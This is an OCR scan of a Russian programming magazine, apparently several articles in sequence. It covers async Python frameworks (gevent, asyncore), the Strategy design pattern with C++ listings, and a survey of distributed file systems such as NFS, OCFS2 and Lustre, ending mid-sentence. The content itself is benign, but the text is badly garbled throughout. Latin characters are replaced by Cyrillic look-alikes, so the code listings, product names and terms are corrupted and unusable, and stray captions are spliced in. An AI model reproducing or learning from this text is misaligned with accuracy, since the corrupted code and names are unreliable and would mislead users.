де+ рг1п*_Веаа(иг1): 
рг1пЕ ('Адрес %$' #% иг1) 
Дафа 
РаПе 


= иг11162.иг1ореп(иг1).геаа() 
%$5: %5 байт: %г' % (иг1, 1еп(аафа), аафа[:50])) 


306$ = [веуеп* . зрамп(рг1п*_Пеа@, иг1) ог иг1 1п иг1 5] 


зеуепф. ]01па11(7055$) 


Как видно из листинга, написание асинхронного кода с беуеп\ 

очень похоже на синхронный стиль программирования. Ты навер- 
няка заметил, что функция ппопКеу.ра{св_а{(}] выполняетза нас всю 
«грязную» работу — какя уже написал ранее, она патчит стандартную 
сетевую библиотеку питона, тем самым превращая синхронный код в 
асинхронный. Например, библиотека игИЬ? из стандартной поставки 
рептилии, которая с помощью «манкипатчинка» превращается в 
неблокирующую, тем самым повышая скорость обработки за счет 
параллельной работы. 
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Плюсы: 

1. Облегчение написания и понимания кода. 

2. Достаточно высокая скорость работы. 

Минусы: 

1. Манкипатчинг работает далеко не со всеми библиотеками. 
2. Функциональный стиль кода, что требует привыкания. 


Нативный аупсоге 


Далеко не все питонисты обращают внимание нато, что в стандартной 
библиотеке питона естьтакой замечательный модуль, как аэупсоге. 
Азупсоге позволяет писать код в событийно-ориентированном стиле 
(использованиетак называемых саЦБаск'ов}, что, впрочем, далеко не 
все любят. Библиотека азупсоге предназначена для настоящих хард- 
корных питонщиков, страдающих МН-синдромом [МН — по пуещед 
Кеге), но никто не говорит отом, что это плохо. Моеличное мнениеза- 
ключается втом, что нужно хорошо разбираться в инструментах, которые 
ты используешь, и именно эта библиотека дает неплохой шанс освоить 
тонкости асинхронного программирования, тем более, что ее код очень 
приятен и понятен. С ее помощью утебя есть возможность написать 
собственный крутой сервер по параллельной обработке множества за- 
просов — кпримеру, балансер. 


Иэто все? 


Нет! В Сети ты можешь найти ещеуйму различных сетевых асинхрон- 
ных фреймворков для нашего любимого питона, у каждого из нихесть, 
несомненно, плюсы и минусы. Асинхронность — это круто ровно дотех 
пор, покатебе не нужно будет выполнить какой-то сложный по ресур- 
созатратам код: выборка из огромной базы данных, поиск файлов итак 
далее, так как в этом случае наш поток будет надолго занят, а клиенты 
будутвынуждены ждать. Все это следствие синхронного подхода в 
решении проблем. Еще должно пройти достаточно много времени, пока 
современные методы программирования перейдут наасинхронный 
лад, так как это требует переписывания огромного количества кода в 
достаточно неудобном стиле. А что насчетинструмента? Помни, мой 
друг, что преждевременная оптимизация работы приложения — не 
есть добро. Знай, что лучше написать, а потом оптимизировать, нежели 
гнаться за скоростью и в итоге так ничего путного и не написать. Если 
ты получаешь огромное удовольствие отнаписания своего очередного 
шедевра на П}апао, то пиши на нем. В конечном счете, мы — одни изтех 
немногих, кто действительно счастлив, работая... == 
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СОРМС 


Программерские 
ТИПСЫ И Триксы 


Обзор асинхронных фреймворков для РУПоп 


© Для того чтобы стать хорошим ООП-программистом, мало знать, что такое инкапсуляция, поли- 
морфизм и наследование. Нужно уметь нечто большее. Создание крупных приложений переводит 
обычного кодера в звание проектировщика, а это, в свою очередь, подразумевает умение мыслить 
глобально и видеть весь проект целиком. Любой архитектор ПО должен знать множество стан- 
дартных паттернов проектирования и уметь распознавать места, в которых их можно применить. 
Сегодня мы познакомимся с одним из паттернов и поймем, насколько классическое ООП несовер- 


шенно и беспомощно. 


Объектно-ориентированное программирование позволяет создавать 
сложные приложения, код которых при этом достаточно просто читать, 
сопровождать и расширять. При правильном использовании ООП за- 
частую можно значительно уменьшить количество комментариев. Но, 
к сожалению, базовые принципы ООП (инкапсуляция, полиморфизм 

и наследование] зачастую не могут обеспечитьту гибкость, которая 
требуется для активно развивающихся систем. В свою очередь это 
приводит клогическим ошибкам, дублированию кода и неэффектив- 
ной архитектуре. Поэтому для более-менее серьезных проектов спецы 
в области ООП предпочитают использовать разнообразные паттерны 
проектирования, которые позволяютбез особых усилий обеспечить 
повторное использование кода. Собственно повторное исполь- 
зование кода — это одна из причин, благодаря которой объектно- 
ориентированное программирование стало так популярно. 

Если кто-то сомневается, что все эти конструкторы, деструкторы, 
виртуальные функции и прочие ОО-штуки не могут полностью пере- 
крыть все потребности в современном программировании, тоя при- 
веду простой пример, который поможет в это поверить. 

Итак, представь, что ты создал интерактивный каталог сотовых теле- 
фонов. Это — твой бизнес, он приносит деньги, и его надо развивать. 
Тем более что индустрия мобильных звонилок не стоит на месте и 
тоже движется вперед семимильными шагами. Все было хорошо, 
когда мобилки были простыми, имели монохромные дисплеи и по- 
лифонические мелодии. В те времена код твоего каталога выглядел 
примернотак: 


Иерархия классов мобильных телефонов 
с1аз5 Моб11еРНопе 


{ 

рыБЕтсС: 
\014 415$р1ау() =@; 
\01 таКе$оипа() 


| 


//код воспроизведения мелодии вызова 


р: 


с1а$5 М№оК1а3310 : рчб11с Моб11еРПопе 


а 
\о1а а15р1ау() 
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{ 
// код вывода телефона на дисплей 
}; 
} 
с1а$$ 51етеп$АЗ5 : риб11с Моб11еРПопе 
{ 
\о1а 415$р1ау() 
{ 
// код вывода телефона на дисплей 
}; 
} 


Здесьу нас есть базовый класс МобЦеРПопе, который описыва- 

ет два общих для всех потомков метода: 915р(ау(] итаКе5оип9}. 
Причем таКебоипа имеет сразу и реализацию, ведь все трубки 
умеют воспроизводить только полифонию. А вота!р(ау являет- 

ся абстрактным методом, каждый дочерний класс реализует его 
по-своему, так как каждая мобилка имеет свой неповторимый и 
сногсшибательный дизайн. 

И все утебя было хорошо дотех пор, пока втелефонах не стали появ- 
ляться фотокамеры, а вместе с ними и тр3-мелодии. И если пр3Зты 
еще хоть как-то мог игнорировать (есть звук при звонке — и ладно}, 
то отсутствие возможности запечатлеть любимую кошечку пользова- 
тели простить не смогут. Атутеще и конкурент объявился, у которого 
и пр3 работает, и фотик фоткает. Надо что-то делать! 


Классический ООП-подход 


Первое, что приходит в голову — добавить метод такеРРВото в 
базовый класс МобЦеРБопе. Идея в принципе неплохая, если не 
считать того, что Мок!а 3310 вдруг каким-то образом научилась 
фотографировать :}. 


Добавляем метод таКеРПо{о 
с1а55 Моб11еРПопе 
т 
рчб11с: 
\014 415р1ау() =@; 
\014 таКеЗоипа () 


{ 
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__ Сгаве Сопигиес _ 


[299'е== [Газети 
—_ 


а Ма Та 


зеимеие асе 


ОМ!-диаграммы помогают разобраться в хитросплетениях связей между классами 


//код воспроизведения мелодии вызова 


}; 


// добавляем метод фотографирования 
\014 такКеРПофо() 
{ 
//код для фото 
}; 


№оК1а3310 тоб11еРПопе; 

// Кирпичик от МоК1а научился фотографировать 
// Так быть не должно 

тоб11еРПопе .такеРПо*о(); 


Такой подход в данном случае совершенно неприемлем. У насесть 
несколько тысяч трубок без фотокамеры и в будущем бесконечное 
множество мобилок с фотиками. Причем бюджетные модели с 
минимальным набором функций (читай — только звонят и отправ- 
ляют 5М5}] тоже никто не отменял. Можно, конечно, переопределить 
метод пакеРПо{о в телефонах, которые не умеют делать цифровые 
снимки, но это не наш метод, поскольку могут возникнуть ошибки, да 
и править несколько тысяч классов слишком лениво. И, кстати, у нас 
еще же висят в воздухе пр3-звонки. Напрягаем мозги придумываем 
новый архитектурный изыск. 


Используем интерфейсы 


Для того чтобы избежать проблем, которыеу нас возникли при ис- 
пользовании стандартного механизма наследования, можно попро- 
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бовать использовать интерфейсы — то есть сущности с описанием, 
но без реализации. Во многих языках программирования интерфей- 
сы поддерживаются на нативном уровне, например, в /]ауа или РНР, 
но в С++ такое понятие отсутствует. Но это не является большой про- 
блемой, так как множественное наследование и абстрактные классы 
успешно справляются со всеми обязанностями интерфейсов. 
Создадим абстрактный класс [интерфейс] РВооСатега, который 
будет описывать метод пакКеРВо\фо. При этом не забудем убрать его 
из класса МобЦеРвВопе. Теперь только мобильники с фотокамерами 
будут наследовать интерфейс 'РВо{оСатега, и наша «Нокиа 3310» 
уже не будет поражать всех пятимегапиксельными снимками. 


Использование интерфейса РВо{оСатега 
с1аз5 1РИофоСатега 


{ 
\014А маКеРПо\о() = 9; 


с1а$$ Мофого1аЕ9 : риб11с Моб11еРНопе, риб11с 1РИофоСатега 


{ 
\01аА такКеРПото() 


{ 


// код, отвечающий за фото 


}; 


с1а$$ Мофого1аЕ7 : риб11с Моб11еРНопе, риб11с 1РИотоСатега 


{ 
› 119 
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Применять паттерны можно и в С++ 


\о1а такеРНофо( ) 
{ 


// код, отвечающий за фото, такой же, как и для Мофого1аЕ9 


// Дублирование кода 
}; 


Все, казалось бы, хорошо, но мы неучли одну вещь — интерфейс 
предоставляеттолько описание методов, но не их реализацию. А это 
значит, что нам надо будет в классе каждой звонилки реализовывать 
гпакеРро\{о()}. Из-за этого мы получим дублирование кода и кучу потен- 
циальных ошибок. Конечно, в срр можно схитрить и прикрутить реали- 
зацию гпакеРрВото в классе 'РафоСатега, но даже несмотря нато, что 
тогда этот класс перестанет быть интерфейсом, мы все равно не решим 
проблему. Ведь камеры бывают разные: с автофокусом и без, с СМО$ 
матрицей и ССП... От всех этих параметров будет зависеть реализация 
гпакеРВото, и определять один метод для всех классов просто нельзя. 
Очередная неудача, но мы уже близки к правильному решению. Еще 
немного скрипа мозгов — и все будет работать как надо. 


Паттерн «Стратегия» 


В основе любого паттерна проектирования лежит принцип, который 
требует отделить изменяющиеся куски кода от постоянных. Мы это 
уже практически сделали, перенеся функционал фотокамеры в 
отдельный интерфейс. Мы выделили аспект поведения, определив 
абстрактный класс 'РАо{оСагтега, но не изолировали алгоритмы, ре- 
ализующие этот аспект. Другими словами, код функции пакКеРВсоко 
надо тоже вынести из иерархии классов сотовых телефонов. 

Сделать это довольно просто — надо лишь определить несколько 
субклассов, базовым для которых является РПофоСатега. На С++ это 
будетвыглядетьтак: 


Выносим таКеРВо\%о() из иерархии классов сотовых телефонов 
с1а5$5 1РАофоСатега 


{ 

\о1а такеРНофо() = 09; 
} 
с1а$$ БоРИофо : риб11с 1РИофоСатега 
{ 

\о1а такеРНофо( ) 

{ 

// код, отвечающий за фото 

}; 
} 
с]1а$5 СапБоРпо®о : риб11с 1РПофоСатега 
{ 
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\0о1а таКеРПофо( ) 

{ 
// пустой метод 
// для мобилок, которые не умеют фотографировать 
гефигп; 


И: 


Как видно из кода, мы создали два класса: ОоРВо{о и Сап{ОоРПо{о. 
Оба они наследуют интерфейс 'РПофоСатега и реализуют метод 
пакеРВо\о(). Таким образом, мы выделили аспект поведения (спо- 
собность фотографировать} и закрепили за этим аспектом алгорит- 
мы. Класс ОоРВо{о способен делать снимки, а Сап{ОоРВо{о — не 
способен, и тело пакеРрВо\{о остается пустым. 

Мы разделили все мобильники на две группы и при этом избежали 
проблем, которые возникали при использовании предыдущих под- 
ходов. Нет дублирования кода, нет логических ошибок в духе «3310 
обзавелся фотокамерой». Также можно поступить и с воспроизведе- 
нием тр3-мелодий. 


Выносим реализацию тр3 и полифонии 
с1аз$ 1РПопеФоипа 


| 


\014 таКе$оипа() = 9; 


с1а5$ Ро1урПопу$оипа : риб11с 1РНофо5$оипа 
| 


\014 таКе$оипа() 


{ 


// код, воспроизводящий полифонические мелодии 


р 


с1а$$ Мр3$оипа : риб11с 1РИофо$оипа 
{ 


\014 таКе$оипа( ) 
{ 
// код, воспроизводящий тр3З 


т: 


Принцип тутточно такой же, каки с фотокамерой. Мы опреде- 

лили интерфейс 'РБопеЗоипа и реализовали в субклассах 
РоурРопубоипд и Мр3Збоип4 метод пакКебоипа(). Такой подход, 
помимо решения перечисленных выше проблем, позволяетещеи 
менять поведение мобилок на лету, в процессе выполнения кода. 
Это на самом деле очень полезно и обеспечивает большую гибкость 
архитектуры. Мобильники с возможностью воспроизведения тр3 
могут также хорошо пропищать что-нибудь в свой полифонический 
синтезатор. Пользователям нашего каталога может прийти в голову 
прослушать этот писк, и изменение поведения объекта на стадии 
выполнения нам очень пригодится. 

Но радоваться еще рано. Надо как-то привязать вновь созданные 
интерфейсы к классам мобильных телефонов. Для этого в базовом 
классе Моб(еРВопе объявим две переменные, одна из которых будет 
иметь тип 'РБопеСатега, а другая — 'РПопеЗоипа. 


Интеграция поведения с классом МобЦеРПВопе 
с1аз$ Моб11еРйопе 


у 
рготестеа: 


1РКофоСатега &рпофоВепау1ог; 
1РПофобоипа &зоипаВейау1ог; 


риБе : 
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На /ауа часто пишут особо крупные серверные 
приложения. Грамотное построение архитектуры 
там просто необходимо 


\014 41$р1ау() =@; 
\014 таКе$оипа() 


{ 


зоипаВейау1ог.таКке$оипа (); 


}: 


\014 такКеРПофо() 
{ 


рпофоВейау1ог .таКеРНо®о(); 


|: 


Помимо интерфейсных переменных мы объявляем в классе 
Мобр{еРВопееше и методы такеРРВото и такебоипа, но их выполне- 
ние делегируем рпо{оВейамоги зоипаВейамюг. Классы, описывающие 
конкретные модели телефонов будут инициализировать переменные 
рпо{оВейамог и зоипаВейамюг нужными реализациями соответствую- 
щих интерфейсов. Чтобы было понятнее, взглянем на код: 


Субклассы МобЦеРвПопе 
с1а5$ Мофого1аЕ9 : риб11с Моб11еРпопе 


{ 
МофогоТаЕ 9 () 
| 
рпофоВейпау1ог = пем ВоРпо\о(); 
зоипаВейау1ог = пем Мр3З5оипа(); 
}; 
} 
с1а$5 М№оК1а3310 : рчб11с Моб11еРПопе 
т 
№К1а3310() 
{ 
рпофоВепау1ог = пем СапЕВоРНо\о(); 
зоипаВейау1ог = пем Ро1урПопу$оипа (); 
}; 
} 


Мофого1а! 9 тофог; 

// моторола успешно делает фото 
тофог.такеРпо*о(); 

// ..и проигрывает тр3 
тофог.такеЗоипа(); 
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МоК1а3 310 пок1а; 

// а вот 33190 не может фоткать даже при том, что вызов метода 
проходит успешно 

пок1а.такеРНо*о(); 

// и играет полифонию 

пок1а.таКе$оипа (); 


В данном случае конкретную реализацию какого-либо интерфей- 

са мы жестко привязываем к переменной в конструкторе на этапе 
компиляции. Это не совсем правильно, но в рамках нашей задачи не 
существенно. Теперь на наши мобильники не влияет изменение кода, 
ответственного за фото и звук. Мы можем добавлять скольугодно 
много новых реализаций этих функций, и это никак не отразится на 
уже существующих классах. 

Некоторые могут спросить, почему мы реализовали связь с интер- 
фейсами при помощи отношения «содержит», а не «является». 
Иными словами, почему мы включили переменные рпотоВепамоги 
5оипаВейам!ог внутрь класса МобЦеРПопе, а не объявили базовыми 
классами конкретные реализации интерфейсов для классов сотовых 
телефонов? Основная причина заключается в том, что мы бы поте- 
ряли гибкость и не смогли динамически менять поведение объектов 
класса. Сейчас, чтобы заставить мобилку с тр3-мелодии переклю- 
читься на полифонию, достаточно использовать 5е{-метод, который 
переопределит зоипаВервам!ог. 


Динамическое изменение поведения 
с1а$$ Мофого1аЕ9 : риб11с Моб11еРПопе 


{ 
МофогоТаЕ9() 
{ 
рпофоВевау1ог = пем ВоРпото(); 
зоипаВервау1ог = пем Мр3З5оипа (); 
}; 
\01а зе ТРПопе5оипа ( 1Рпопе5оипа &5оипа ) 
{ 
5оипаВеНаутог = зоипа; 
}; 
| 


Мофого1а!9 тофог; 

// проигрываем тр3 

тофог.таке5оипа(); 

// меняем на полифонию 

тофог . 5е{ТРНопе5оипа ( пем Ро1урПопу$оипа()); 
// и играем уже полифоническим синтезатором 
тофог.таКе$оипа(); 


Все это вместе и есть паттерн «Стратегия». Если попытаться дать более- 
менее строгое определение, то можно сказать, что паттерн «Стратегия» 
определяет семейство ал горитмов, инкапсулирует каждый изнихи 
обеспечиваетих взаимозаменяемость. Он позволяет модифицировать 
алгоритмы независимо отих использования на стороне клиента. 


Заключение 


Теперь мы знаем, что такое паттерн «Стратегия». Более того, теперь 
мы поняли суть программирования с помощью паттернов, которая 
заключается в выделении непостоянных кусков кода и их изо- 
лировании от более стабильных частей. В следующих статьях мы 
познакомимся с другими приемами для проектирования боль- 

ших приложений иеще больше приблизимся куровню гуру ОО- 
программирования. 22 
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ш м Евгений Зобнин [ехесЬЁ.ги) 


еть из файлов 


Распределенные файловые 


системы наших днеи 


Популярность модели облачных вычислений, достигшей в последние годы чуть ли не своего 
апогея, привела к бурному развитию так называемых кластерных файловых систем, способных 
обеспечить простой и надежный способ хранения данных на множестве узлов с возможностью 
доступа к ним сотен и тысяч клиентов. Проблема ТОЛЬКО В ТОМ, ЧТО информации о таких ФС не 
так много, и с наскоку разобраться В ИХ разнообразии ДОВОЛЬНО проблематично. 


В этой статье мы рассмотрим несколько примеров различных рас- 

пределенных файловых систем, определим сферы их применения 

и постараемся разобраться стем, почему этот вопрос часто вводит 
в заблуждение даже матерых админов. Начнем, как и полагается, с 
терминологии, аточнее — с ее отсутствия. 


Зерна от плевел 


Основная проблема новичков, делающих первые шаги в область 
кластерных (или все-таки распределенных?} файловых систем 
заключается в том, что здесь до сих пор не существует четкой тер- 
минологии, отделяющей множество самых разнообразных ФС друг 
от друга. Такие понятия как сетевая, кластерная, распределенная 
и даже параллельная ФС уже давно слились в одно целое, поэтому 
для неподготовленного человека оказывается чрезвычайно 
трудно выбратьту ФС, которая лучше всего подходит для решения 
его задачи. 

Чтобы не запутывать себя и читателя, я буду использовать метод 
классификации ФС, основанный на сфере их применения. В моей 
терминологии будет всего три основных типа ФС: 

1. Сетевые. Это файловые системы, предназначенные в первую 
очередь для расшаривания не слишком интенсивно используемых 
данных между небольшим количеством узлов. Типичнейший при- 
мер сетевой файловой системы — это МЕ в ЧМХ и (ЕЗ в \ММп9ом5. 
Обычный пример ее использования — обмен документации между 
рабочими станциями или разделение общей корневой ФС между 
несколькими серверами. Плюстаких ФС — простота обслуживания, 
минус — низкая производительность и стойкость к нагрузкам. 

2. Кластерные. Это файловые системы, предназначенные для рас- 
шаривания данных между большим количеством узлов вычисли- 
тельного кластера. По самой своей природе являются более про- 
двинутой версией сетевых ФС с высокой производительностью, 
поддержкой защиты от сбоев, высоких нагрузок и большого коли- 
чества клиентов. В качестве примера таких ФС можно привести 
СЕЗ/СЕ52 от Веда На! и ОСЕ52 от Огас(е. Это — своего рода «вещьв 
себе», поэтому говорить о минусах и плюсах здесь не стоит. 

3. Распределенные. Наиболее продвинутый в технологическом 
плане тип ФС. От первых двух отличается в первую очередьтем, 
что позволяет объединить множество удаленных хранилищ в 
одну большую виртуальную файловую систему, функционирую- 
щую какединое целое, атакже имеет способность достаточно 
быстро работать поверх не самых быстрых каналов связи. Основ- 
ное назначение такой ФС — те самые облака и СКО, хранилище 
для которых можно составить из множества дешевых, разнесен- 
ных по разным частям света серверов. Примеры: Гиз ге, Серв, 
Сш${егЕЗ и конечно же боод(еР5, используемая для поддержки 
серверов бооч(е. 


Теперь, следуя этой простой классификации, рассмотрим наи- 
более интересные и успешные примеры реализации ФС каждого 
типа. 


МРЪ, СЕ и РОНМЕЕР 


Наверное, самая известная и узнаваемая реализация идеи 
сетевой файловой системы [по крайней мере для тех, кто знаком 

с УМХ] — это МЕ5, название которой так и расшифровывается — 
Мемогк ЕЦе бузет. 

МЕб была разработана компанией бип Мтсгозу${етпз [ныне Огас(е] 
еще в конце восьмидесятых годов и стала общепринятым стандар- 
том после выхода в свет версии 2.0 в 1989 году, когда и был утверж- 
ден описывающий ее стандарт РЕС1094 [первая версия системы, а 
точнее протокола, лежащего в его основе, была закрытым экспери- 
ментальным проектом, который видели только сотрудники Зип]. 
Несмотря на громкое название, МЕЗ не является файловой 
системой в прямом смысле этого слова. На самом деле — это 
сетевой протокол, предназначенный для удаленного вызова про- 
цедур (КРС}, реализующих набор функций для доступа к файлам, 
управляемых любой файловой системой. Такой подход сделал МЕЗ 
чрезвычайно простой системой, благодаря которой она быстро 
распространилась за пределы операционной системы $ип05, для 
которой была изначально разработана. Сегодня реализации МЕЗ 
третьей версии доступны практически для любой мало-мальски 
популярной ОС, включая минималистичные системы для низко- 
производительных устройств. 

Предельная простота настройки также сыграла свою роль в по- 
пуляризации технологии. Фактически все, что требуется сделать, 
чтобы настроить МЕ5-сервер, — это добавить по одной строке в 
два системных конфигурационных файла (/е{с/ехрог{$ и /еёс/Воз{5. 
а(о\м/ и перезапустить сервер п{54. Далее можно примонтировать 
файловую систему с удаленной стороны точно так же, как это дела- 
ется для локальной ФС. Для монтирования доступных только для 
чтения корневых файловых систем серверов это просто идеаль- 
ный вариант, однако когда речь заходит об организации доступа 
десятков и сотен клиентов к хранилищу для записи и чтения, МЕ$ 
начинает подводить. 

Главная беда МЕ$ — это производительность. Являясь всего лишь 
протоколом, МЕ$ просто технически не способен обеспечить 
приемлемый уровень производительности для одновременного 

и быстрого обслуживания множества клиентов. Все попытки при- 
способить протокол для этой задачи провалились или были просто 
не замечены администраторами на фоне появления распреде- 
ленных и кластерных файловых систем. Инициативы по созданию 
«правильной альтернативы» также в большинстве своем ни кчему 
не привели, за исключением разве что файловой системы с экс- 
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центричным названием РОНМЕЕЕ$, однако она носит 
статус экспериментальной и работает только в Ипих 
[подробнее во врезке}. 

Вторая беда МЕ$ — это отсутствие того, что в среде 
программистов принято называть термином сасйе- 
сорегеп(. Протокол МЕ$ устроен так, что ни один клиент 
расшаренной файловой системы не имеет гарантии 
того, что полученные клиентом метаданные файлов 
будут актуальны в следующий момент времени. На 
практике это означает, что если клиент «А» запросит 
усервера информацию о файле (имя, размер, даты 
создания и модификации, права доступа ит.д.) а 
клиент «Б» сразу после этого переименует этот файл 
или, например, изменитего права доступа, то клиент 
«А» не узнает о случившимся и будет иметь ложное 
представление о файле со всеми вытекающими отсюда 
последствиями. При подключении ФС в режиме геад- 
оп это не приведет ни чему плохому, так как состояние 
ФС неизменно, а вот при параллельной интенсивной 
работе с данными, доступными для записи, может вы- 
литься во что угодно. 

Эти проблемы делают МЕ$ неприемлемым для исполь- 
зования в кластерах, предусматривающих наличие 
большого количества интенсивно работающих с дан- 
ными клиентов. Поэтому для этих целей были созданы 
кластерные файловые системы. 


ОСРЪ2 и СР52 


Кластерные файловые системы устроены совершенно 
иначе. Их задача заключается не в доставке данных 
по каналам связи, а в реализации механизма, который 


бы позволил получить доступ к этим данным сразу с 
нескольких машин и обеспечивал своевременное 
информирование клиентов о любых изменениях в 

ФС и обработку возможных ошибок и сбоев в работе 
клиентов. 

Кластерные ФС представляют собой дисковую фай- 
ловую систему, которая реализует схожие с совре- 
менными ФС возможности, но использует несколько 
иной механизм работы, предполагающий наличие 
большого количества клиентов, одновременно под- 
ключающих ФС к своему пространству имен. Работа 
по доставке данных при этом возлагается на специа- 
лизированное оборудование, такое, как серверы 5АМ, 
позволяющие разделить общий диск между десятка- 
ми машин с помощью протоколов Е'БгеСВаппе!, 15С $1 
или АоЕ. 

Три главные характеристики кластерных или, как их 
иногда называют, параллельных ФС — это доступ- 
ность данных, производительность и устойчивость к 
ошибкам, выходу использующих ее узлов из строя. При 
этом далеко не все из них достигаются с помощью реа- 
лизации определенных механизмов внутри драйвера 
файловой системы. 

Например, высокая доступность данных обычно до- 
стигается за счет использования различных схем КАО, 
а также механизмов 5АМ и источников бесперебой- 
ного питания. Эта характеристика не имеет прямого 
отношения к самой ФС, однако является важной для ее 
пользователей. 

Производительность также является следствием ис- 
пользования соответствующих технологий, которые 
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Консоль управления ОСЕ52 


позволяют доставлять данные быстро и без задержек, однако 
здесь кластерные файловые системы также играют свою роль. 
Чтобы клиенты файловой системы не могли нарушить ее целост- 
ность, используется механизм блокировок, который управляет 
доступом узлов к данным, позволяя заблокировать файл для всех 
остальных участников кластера, вто время как один узел изменяет 
его содержимое. Это стандартная мера защиты, предотвращаю- 
щая порчу данных, реализацию которой можно найти влюбой 
классической ФС. Однако в кластерной ФС она имеет некоторые 
особенности, улучшающие общую производительность. 

При интенсивной работе с данными, классический механизм 
блокировок становится узким местом и может привести к суще- 
ственным задержкам. Современные кластерные ФС используют 
более гибкую систему блокировок, которая позволяет блокировать 
не весь файл целиком, а только его часть, нужную для запи- 

си клиентом, позволяя другим клиентам в это время спокойно 
модифицировать другие части этого файла. Подобный механизм 
предусмотрен и для блокирования тподе. Также, для улучшения 
производительности кластерная файловая система можеттребо- 
вать отдельный сервер управления метаданными, который будет 
быстро обрабатывать запросы на доступ и модификацию поде- 
записей файловой системы, однако современные кластерные ФС, 
такие как СЕ$2 или ОСЕЗ2, используют вместо этого метод пере- 


кладывания этих функций на плечи клиентов. Так, чтобы каждый 
клиент отвечал за метаданные тех файлов, с которыми он работает 
больше других. 

Устойчивость к ошибкам и гарантия целостности файловой 
системы достигаются несколькими путями. Во-первых, за счетис- 
пользования менеджера блокировок, который не является частью 
файловой системы и работает как независимый сетевой сервис 
(например, в СЕ52 используется ОЕМ — 01 щед Госк Мападег). 
Именно он отвечает за блокировку файлов и распространение 
жетонов, используемых для получения прав на модификацию тех 
или иных частей ФС, между клиентами. Кроме того, обычно он же 
выполняет роль информатора клиентов о текущем состоянии ФС, 
решая таким образом главную проблему протокола МЕЗ и всех 
других подобных ФС. В идеале уровень осведомленности узлов 
кластерной файловой системы должен стать таким, чтобы влюбой 
момент времени любой клиент ФС смог иметь точное представ- 
ление отекущем положений вещей вне зависимости от выхода 
отдельных узлов из строя (СР52 и ОСЕ5?2 обеспечивают это). 
Наконец, в-третьих, любая кластерная файловая система имеет 
механизм извещения об узлах, вышедших из строя, который по- 
зволяет оперативно отключить неисправных клиентов до того, 
какони успеют навредить содержимому файловой системы. Этот 
механизм называется {епс!пд и так же, как менеджер блокировок 
реализуется в виде независимой сетевой службы, которая, тем не 
менее, работает в тесном контакте с самой ФС. Как и большинство 
классических файловых систем, современные кластерные ФС 
журналируемые, а это значит, что любые изменения метаданных 
перед тем, как попасть на диск, помещаются в журнал, который 
можно будет использовать для отката и быстрого восстановления 
корректного состояния ФС в случае сбоя. Но кластерная файловая 
система использует журнал также и для того, чтобы бороться со 
сбоями клиентов. 

Достигается это следующим образом. Для каждого подключен- 
ного клиента создается собственный журнал, в котором протоко- 
лируются все действия этого клиента над файлами и их мета- 
данными [либо — для улучшения производительности — только 
метаданными)}, которые стираются после их актуализации, то есть, 
после внесения изменений непосредственно в структуры ФС [до 
этого они какое-то время могут провисеть в кэше). В том случае, 
если клиент начинает работу над каким-то файлом и в это время 
уходит в даун, файловая система получает звоночек, который 
включает механизм отката произведенных им изменений, благо- 
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Похмельная ФС 


Файловая система РОНМЕТЕЗ (НЕ р://Лмммилогегпар.перго]ес"/ 
ройпле[(5}], созданная Евгением Поляковым и уже включенная 

в ядро [упих, сочетает в себе лучшие черты как сетевых, так и 
кластерных ФС. Ее основные особенности: 


® Согласованный кэш данных и метаданных для всех клиентов 
(решение основной проблемы МЕ5)}. 

® Асинхронный режим работы. 

» Высокая производительность. 

® Прозрачное зеркалирование данных на несколько узлов 
сети [этакий сетевой РА!О] с возможностью параллельного 
получения данных с них. 

» Возможность на лету добавлять и удалять серверы хранения 
без перемонтирования ресурса. 

» Встроенные средства аутентификации и шифрования. 


Как и МЕ$, РОНМЕСЕЗ всего лишь протокол, поэтому она 
априори медленнее кластерных файловых систем и к тому же 
имеет примитивный механизм блокировок, не позволяющий 
блокировать для записи только часть файла или его 
метаданных. 


даря чему ФС удается не остаться в пограничном, противоречи- 
ВОМ СОСТОЯНИИ. 

Описанные особенности делают кластерные файловые системы 
чрезвычайно быстрыми и устойчивыми, однако по мере роста 
количества клиентов их производительность падает, а после 
пересечения рубежа в сотню-другую клиентов становится просто 
неприемлемой. Поэтому для кластеров, имеющих размерность 
больше тысячи узлов, были придуманы самые совершенные из 
ВЪЕА представленных в данный момент файловых систем, которые 
в нашем обзоре носят звание распределенных. 


[ ие, Серп и Си$ТегРЪ 


В распределенных файловых системах используется совершенно 
иной подход куправлению данными, смысл которого не втом, 
чтобы собрать все яйца в одну корзину и обеспечить эффектив- 
ный механизм их совместного использования, как это сделано 

в кластерных ФС, а втом, чтобы размазать данные по как можно 
большему количеству серверов, датак, чтобы клиенты считали их 
одним целым. 

За многие годы исследований было предложено множество 
самых разнообразных подходов к реализации этой идеи, однако 
наибольшее распространение получила архитектура, на которой 
построена файловая система 1 иге. 

[из{ге (млллм.[и5{ге.сого] была разработана компанией Сш${ег 
Ее Зу$<{етсз, которая была поглощена 5ип М!сгозу{етз в 2007 
году. Гиз{ге [название которой произошло от слияния слов Мпих 
и Сш«ег] является полностью открытой разработкой, которую 
можно использовать для любых целей безо всяких лицензионных 
отчислений. 

Главная особенность и достоинство [из{ге — это многоуровневая 
система обработки запросов доступа к данным, которая предпо- 
лагает наличие нескольких типов серверов, каждый из которых 
выполняет определенную роль. 

Всего существуеттри типа серверов: 

1. Сервер метаданных [МО5}, который отвечает за хранение 
метаданных файлов, таких как имя, размер, атрибуты, содержимое 
каталогов ит.д. Это первое звено на пути обработки запроса на 
доступ к данным. Задача сервера метаданных — принять запроси 
вернуть информацию о файле и/или ссылку на «объект», который 


поде: 
1р_рогф = 7777 
1р_адге$5$ = 192.168.1.2 
питбег = й 
пате = поде1 
с1и5Ттег = ос7$2 


поде: 
1р_рог{ = 
1р_адге$$ = 
питбег = 1 
пате = поде? 
с|1изтег = ос{$2 


7777 
192.108.1.3 


с|1изТтег: 
поде_соиупт = 2 
пате = 0с7$2 


Конфигурационный файл для ОСЕ52 


хранится на сервере хранения. 
2. Сервер хранения объектов [055}]. Здесь хранится содержимое 
файлов, то есть объекты, адресуемые сервером метаданных. Когда 
последний получает запрос на чтение/запись определенного 
файла, он отдает клиенту ссылку на объект файла, которая состоит 
из адреса сервера хранения и идентификатора объекта, после 
чего клиент самостоятельно запрашивает содержимое объекта у 
сервера хранения. Каждый такой сервер может иметь от двух до 
восьми целей хранения [0$Т), которые могут быть либо жесткими 
дисками, либо любыми другими блочными устройствами, включая 
виртуальные образы. 

3. Сервер управления [МСб5). Он ответственен за хранение конфи- 
гурации всей файловой системы и отвечает заее распростране- 
ние между остальными участниками. Обычно Мб5$ совмещается с 
сервером метаданных. 

Конфигурация кластера, использующего файловую систему [изге, 
обычно выглядит следующим образом: несколько десятков или 
сотен машин выполняют роли серверов хранения, еще несколь- 
